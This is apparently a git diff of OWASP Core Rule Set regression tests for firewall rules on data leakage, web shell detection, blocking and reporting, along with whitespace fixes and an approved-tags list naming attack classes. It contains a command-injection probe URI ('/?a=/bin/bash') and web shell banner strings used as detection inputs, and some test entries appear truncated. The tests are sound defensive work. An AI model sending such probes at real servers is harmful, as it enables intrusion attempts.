"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "This is a static function" + output: + log_contains: id "953101" + - test_title: 953101-5 + desc: "'cannot be empty is too common for PL-1, it should match at PL-2 GH isue #3399" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "cannot be empty." + output: + log_contains: id "953101" diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml new file mode 100644 index 0000000000..89d5ab3857 --- /dev/null +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml @@ -0,0 +1,147 @@ +--- +meta: + author: "fzipi" + enabled: true + name: "953120.yaml" + description: "Positive tests for rule 953120" +tests: + - test_title: 953120-1 + desc: "Just something that returns + output: + log_contains: "id \"953120\"" + - test_title: 953120-2 + desc: "Negative test, returns + output: + log_contains: "id \"953120\"" + - test_title: 953120-6 + desc: "Negative test, returns + output: + log_contains: "id \"953120\"" diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml new file mode 100644 index 0000000000..d5fb143d70 --- /dev/null +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml @@ -0,0 +1,23 @@ +--- +meta: + author: "Andrew Howe" + enabled: true + name: "954100.yaml" + description: "Tests for rule 954100" +tests: + - test_title: 954100-1 + desc: 'Returns C:\inetpub in the response body. Sends as Base64 encoded rather than using /anything to avoid the backslash being escaped in the response.' + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: "GET" + version: "HTTP/1.0" + uri: "/base64/QzpcaW5ldHB1YiAK" + output: + log_contains: "id \"954100\"" diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml new file mode 100644 index 0000000000..fc38fa89c5 --- /dev/null +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml @@ -0,0 +1,43 @@ +--- +meta: + author: "Felipe Zipitria" + enabled: true + name: "954120.yaml" + description: "Tests for rule 954120 - IIS Error information disclusure" +tests: + - test_title: 954120-1 + desc: 'Match IIS error page' + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: "POST" + version: "HTTP/1.1" + uri: "/anything" + data: | + text=404.14 - URL too long. + output: + log_contains: id "954120" + - test_title: 954120-2 + desc: 'Match IIS error page' + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: "POST" + version: "HTTP/1.1" + uri: "/anything" + data: | + text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed. + output: + log_contains: id "954120" diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml new file mode 100644 index 0000000000..bd60930d49 --- /dev/null +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml @@ -0,0 +1,70 @@ +--- +meta: + author: "azurit" + enabled: true + name: "955100.yaml" + description: "Regression tests for rule 955100" +tests: + - test_title: 955100-1 + desc: "Matching web shell NCC Shell" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: | +

.:NCC:. Shell v + output: + log_contains: "id \"955100\"" + - test_title: 955100-2 + desc: "Matching web shell Simple PHP backdoor" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: | + + output: + log_contains: "id \"955100\"" + - test_title: 955100-3 + desc: "Matching web shell WinX Shell" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: | + -:[GreenwooD]:- WinX Shell + output: + log_contains: "id \"955100\"" diff --git a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml new file mode 100644 index 0000000000..38d62b5fcc --- /dev/null +++ b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml @@ -0,0 +1,71 @@ +--- +meta: + author: "studersi" + enabled: true + name: "959100.yaml" + description: | + Test whether the outbound blocking mechanism works by testing whether rule 959100 is triggered. + For these tests, existing test are repurposed with different assertions. Instead of asserting that the original + rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking + rule to be triggered. +tests: + - test_title: 959100-1 + desc: Test is basically identical to 953120-0 (PHP leakage positive test in phase 4) but here we assert that the outbound blocking mechanism is triggered + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: + output: + log_contains: "id \"959100\"" + - test_title: 959100-2 + desc: Test is basically identical to 953120-1 (PHP leakage negative test in phase 4) but here we assert that the outbound blocking mechanism is not triggered + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: + output: + log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: " diff --git a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml new file mode 100644 index 0000000000..563d6cfce9 --- /dev/null +++ b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml @@ -0,0 +1,66 @@ +--- +meta: + author: "studersi" + enabled: true + name: "980170.yaml" + description: | + Test whether level 4 inbound reporting in phase 5 works by testing whether rule 980170 is triggered. + For these tests, existing test are repurposed with different assertions. Instead of asserting that the original + rules are triggered that the tests are written for, we assert that triggering these rules causes the corresponding + reporting rules to be triggered. +tests: + - test_title: 980170-1 + desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that was blocked + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + # Will match rules + # - 920273: restricted characters violation + # - 920350: numeric IP in Host header + # - 932160: Unix remote command execution + # - 932236: Unix command injection + # - 932260: Unix remote command execution + uri: "/?a=/bin/bash" + output: + log_contains: "id \"980170\"" + - test_title: 980170-2 + desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that scored but was not blocked + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + # Will match rule 920350: numeric IP in Host header + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + output: + log_contains: "id \"980170\"" + - test_title: 980170-3 + desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is not logged that did not score + stages: + - stage: + input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + output: + no_log_contains: "id \"980170\"" diff --git a/tests/regression/utils/data/popularUAs.data b/tests/regression/utils/data/popularUAs.data index 4675a26b29..bb6f417cb1 100644 --- a/tests/regression/utils/data/popularUAs.data +++ b/tests/regression/utils/data/popularUAs.data @@ -50,7 +50,7 @@ MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8 MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23 Mediapartners-Google Microsoft URL Control - 6.00.8862 -Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) +Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1 Mozilla/2.0 (compatible; Ask Jeeves/Teoma) Mozilla/2.02E (Win95; U) @@ -72,10 +72,10 @@ Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) -Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 -Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 -Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) XV6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) XV6800 Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 8.12; MSIEMobile6.0) Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) @@ -162,7 +162,7 @@ Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535. Mozilla/5.0 (Linux; U; Android 4.1; en-us; sdk Build/MR1) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.1 Safari/534.30 Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19 Mozilla/5.0 (Linux; U; Android 4.3; en-us; sdk Build/MR1) AppleWebKit/536.23 (KHTML, like Gecko) Version/4.3 Mobile Safari/536.23 -Mozilla/5.0 (Linux; webOS/2.2.4; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) webOSBrowser/221.56 Safari/534.6 Pre/3.0 +Mozilla/5.0 (Linux; webOS/2.2.4; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) webOSBrowser/221.56 Safari/534.6 Pre/3.0 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1 @@ -196,10 +196,11 @@ Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us; Silk/1.0.13.81_10003810 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4736.0 Safari/537.36 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8 Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941 -Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 +Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 @@ -212,8 +213,8 @@ Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/ Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 -Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Arora/0.11.0 Safari/533.3 -Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.3.1 Safari/533.3 +Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Arora/0.11.0 Safari/533.3 +Mozilla/5.0 (OS/2; U; OS/2; en-US) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.3.1 Safari/533.3 Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12 Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20130108 Firefox/10.0.12 SeaMonkey/2.7.2 Mozilla/5.0 (PLAYSTATION 3; 1.10) @@ -278,6 +279,7 @@ Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0) Gecko/16.0 Firefox/16.0 Mozilla/5.0 (Windows NT 6.2; rv:19.0) Gecko/20121129 Firefox/19.0 Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36 OPR/18.0.1284.49 Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0 @@ -319,7 +321,7 @@ Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.22 (KHTML like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36 Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 -Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 +Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20120502 Firefox/12.0 SeaMonkey/2.9.1 Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Iceweasel/14.0.1 Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0 @@ -376,7 +378,7 @@ Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6 Mozilla/5.0 (X11; U; Linux i686; rv:19.0) Gecko/20100101 Slackware/13 Firefox/19.0 Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5) Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT -Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT +Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9 Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 @@ -405,7 +407,7 @@ Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0 -Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) +Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11; Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1) @@ -423,8 +425,8 @@ Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko) Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) -Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) -Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0 @@ -473,7 +475,7 @@ Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gec Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145 -Mozilla/5.0 (iPod; U; CPU iPhone OS 6_1 like Mac OS X; en-HK) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IP Mobile +Mozilla/5.0 (iPod; U; CPU iPhone OS 6_1 like Mac OS X; en-HK) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IP Mobile Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 @@ -580,7 +582,7 @@ msnbot/0.11 ( http://search.msn.com/msnbot.htm) msnbot/1.0 ( http://search.msn.com/msnbot.htm) msnbot/1.1 ( http://search.msn.com/msnbot.htm) nook browser/1.0 -portalmmm/2.0 N410i(c20;TB) +portalmmm/2.0 N410i(c20;TB) w3m/0.5.1 w3m/0.5.1 wii libnup/1.0 diff --git a/tests/regression/utils/testSampling.py b/tests/regression/utils/testSampling.py index e7e1223a4f..5d3b7e9bcb 100644 --- a/tests/regression/utils/testSampling.py +++ b/tests/regression/utils/testSampling.py @@ -2,9 +2,9 @@ """ This script assumes that default blocking action is 403 -and sampling is one. It will send a know bad request +and sampling is one. It will send a know bad request that is expected to be blocked. If sampling is on it -will only block a certain percentage. We send 1000 +will only block a certain percentage. We send 1000 requests to verify this. In order to do this we must also turn off IP Reputation blocking. SecAction "id:900005,phase:1,nolog,pass,ctl:ruleEngine=on,ctl:ruleRemoveById=910000" @@ -30,7 +30,7 @@ def run_requests(iterations): status_not_403 = 0 status_403 = 0 for status in returns.values(): - if status == 403: + if status == 403: status_403 += 1 else: status_not_403 += 1 @@ -39,7 +39,7 @@ def run_requests(iterations): print "403s =", x print "not 403s =", y return (x,y) - + def test_sampling(): print "running" block,passed = run_requests(100) diff --git a/tests/regression/utils/testUserAgents.py b/tests/regression/utils/testUserAgents.py index 78af92d54c..9d25266fd2 100644 --- a/tests/regression/utils/testUserAgents.py +++ b/tests/regression/utils/testUserAgents.py @@ -21,17 +21,17 @@ def run_requests(useragent_list): http_ua = http.HttpUA() http_ua.send_request(input_data) status = http_ua.response_object.status - if status == 403: + if status == 403: status_403 += 1 else: - status_not_403 += 1 + status_not_403 += 1 x = (status_403/(len(useragent_list)*1.0))*100 y = (status_not_403/(len(useragent_list)*1.0))*100 print "403s =", x print "not 403s =", y - + def main(): uas = read_useragents('./data/popularUAs.data') run_requests(uas) -main() +main() diff --git a/util/APPROVED_TAGS b/util/APPROVED_TAGS new file mode 100644 index 0000000000..5c48d8ecc4 --- /dev/null +++ b/util/APPROVED_TAGS @@ -0,0 +1,97 @@ +OWASP_CRS +PCI/12.1 +PCI/6.5.1 +PCI/6.5.10 +PCI/6.5.2 +PCI/6.5.4 +PCI/6.5.6 +anomaly-evaluation +application-multi +attack-deprecated-header +attack-disclosure +attack-fixation +attack-generic +attack-injection-generic +attack-injection-java +attack-injection-php +attack-lfi +attack-multipart-header +attack-protocol +attack-rce +attack-reputation-scanner +attack-rfi +attack-sqli +attack-ssrf +attack-xss +capec/1/180/77 +capec/1000/118/116 +capec/1000/118/116/54 +capec/1000/118/116/54/127 +capec/1000/118/224/541/310 +capec/1000/152 +capec/1000/152/137/15/460 +capec/1000/152/137/6 +capec/1000/152/175/253 +capec/1000/152/242 +capec/1000/152/242/63 +capec/1000/152/248 +capec/1000/152/248/136 +capec/1000/152/248/66 +capec/1000/152/248/88 +capec/1000/153/267 +capec/1000/210/272 +capec/1000/210/272/220 +capec/1000/210/272/220/273 +capec/1000/210/272/220/274 +capec/1000/210/272/220/33 +capec/1000/210/272/220/34 +capec/1000/225/122/17/650 +capec/1000/225/21/593/61 +capec/1000/225/664 +capec/1000/255/153 +capec/1000/255/153/126 +capec/1000/255/153/267 +capec/1000/255/153/267/120 +capec/1000/255/153/267/72 +capec/137/134 +capec/272/220 +header-allowlist +language-aspnet +language-java +language-javascript +language-ldap +language-multi +language-perl +language-php +language-powershell +language-ruby +language-shell +paranoia-level/1 +paranoia-level/2 +paranoia-level/3 +paranoia-level/4 +platform-apache +platform-db2 +platform-emc +platform-firebird +platform-frontbase +platform-hsqldb +platform-iis +platform-informix +platform-ingres +platform-interbase +platform-internet-explorer +platform-maxdb +platform-msaccess +platform-mssql +platform-multi +platform-mysql +platform-oracle +platform-pgsql +platform-sqlite +platform-sybase +platform-tomcat +platform-unix +platform-windows +reporting +xss-perf-disable diff --git a/util/av-scanning/runAV/common.c b/util/av-scanning/runAV/common.c index e7ba760696..08d2128903 100755 --- a/util/av-scanning/runAV/common.c +++ b/util/av-scanning/runAV/common.c @@ -24,7 +24,7 @@ int unlock_file(int fd) } int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask) -{ +{ char time_str[64], line[1024*1024]; time_t t; int fd; @@ -61,7 +61,7 @@ int print_request(char* url,char *command,parameter_t *parameters, int num_of_pa else sprintf(line,"\n"); write(fd,line,strlen(line)); } - + } sprintf(line,"%s:REQUEST-END:========================================\n",time_str); write(fd,line,strlen(line)); @@ -165,7 +165,7 @@ int is_proxy_up() if (fscanf(fp,"%d",&pid) == 0) { print_error("is_proxy_up","fscanf","missing PID",0); fclose(fp); - return 0; + return 0; } fclose(fp); @@ -177,7 +177,7 @@ int is_proxy_up() int run_cmd(char *command, char *output, int output_size) { - char line[1024]; + char line[1024]; FILE *fp; if (output_size > 0 && output) output[0]='\0'; @@ -228,7 +228,7 @@ int parse_file(char *filename, parameter_t *parameters, int max_parameters) while ( i < max_parameters && fgets(line,1024,fp)) { if (ptr = strstr(line,"#")) *ptr='\0'; - if (sscanf(line,"%[^=]=%s",parameters[i].name,parameters[i].value) != 2) + if (sscanf(line,"%[^=]=%s",parameters[i].name,parameters[i].value) != 2) continue; i++; } @@ -365,7 +365,7 @@ int parse_query_and_body (parameter_t *parameters, int max_parameters) } query[body_len] = '\0'; num_of_params = parse_query(query,parameters,max_parameters); - free(query); + free(query); return num_of_params; } } @@ -380,10 +380,10 @@ int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, cha if (sscanf(args[i],"%[^=]=%s",name,value) < 2) 